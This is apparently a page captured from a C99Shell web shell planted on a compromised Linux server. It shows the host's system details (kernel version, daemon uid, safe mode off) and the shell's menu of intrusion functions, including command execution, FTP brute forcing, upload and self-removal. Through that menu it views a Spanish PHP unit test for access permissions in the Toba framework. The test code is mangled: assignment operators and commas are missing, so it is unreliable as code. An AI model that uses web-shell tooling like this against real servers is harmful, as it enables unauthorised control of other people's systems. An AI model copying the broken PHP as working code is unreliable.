!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/proyectos/toba_testing/php/testing/test_items/   drwxr-xr-x
Free 14.62 GB of 61.93 GB (23.6%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     test_item.php (1.78 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

class test_item extends test_toba
{

    function 
get_descripcion()
    {
        return 
"Comportamiento básico del ítem";
    }    

    function 
sentencias_restauracion()
    {
        
$sentencias[] = "DELETE FROM apex_usuario_grupo_acc_item WHERE proyecto='toba_testing' AND item = '1000221' ";
        return 
$sentencias;
    }
    
    function 
test_consulta_grupos_acceso()
    {
        
//Un item sin permisos no debe tener grupo de acceso
        
$item toba_constructor::get_info(array('proyecto' => 'toba_testing'
                                                
'componente' => 1000221), 
                                            
'toba_item');
        
$this->AssertEqual(count($item->grupos_acceso()), 0);
        
        
//Item con dos grupos permitidos
        
$item toba_constructor::get_info(array('proyecto' => 'toba_testing'
                                                
'componente' => 1000219), 
                                            
'toba_item');
        
$this->AssertEqual(count($item->grupos_acceso()), 2'La cantidad de grupos debe ser 2 (%s)');
        
$this->AssertTrue($item->grupo_tiene_permiso('admin'), 'Admin tiene derechos sobre el item');
        
$this->AssertTrue($item->grupo_tiene_permiso('documentacion'), 'Documentación tiene derechos sobre el item');        
    }
    
    function 
test_otorgar_permiso()
    {
        
//Se carga un item sin permisos
        
$item toba_constructor::get_info(array('proyecto' => 'toba_testing'
                                                
'componente' => 1000221), 
                                            
'toba_item');
                                            
        
//Se le asigna permisos al documentador en el proyecto de testing
        
$item->otorgar_permiso('documentacion');
        
        
//Se vuelve a cargar debe tener permisos de documentador
        
$item toba_constructor::get_info(array('proyecto' => 'toba_testing'
                                                
'componente' => 1000221), 
                                            
'toba_item');
        
$this->AssertEqual(count($item->grupos_acceso()), 1'Debe haber sólo 1 grupo (%s)');
        
$this->AssertTrue($item->grupo_tiene_permiso('documentacion'), 'Documentacion tiene derechos sobre el item');
    }


}


?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.812 ]--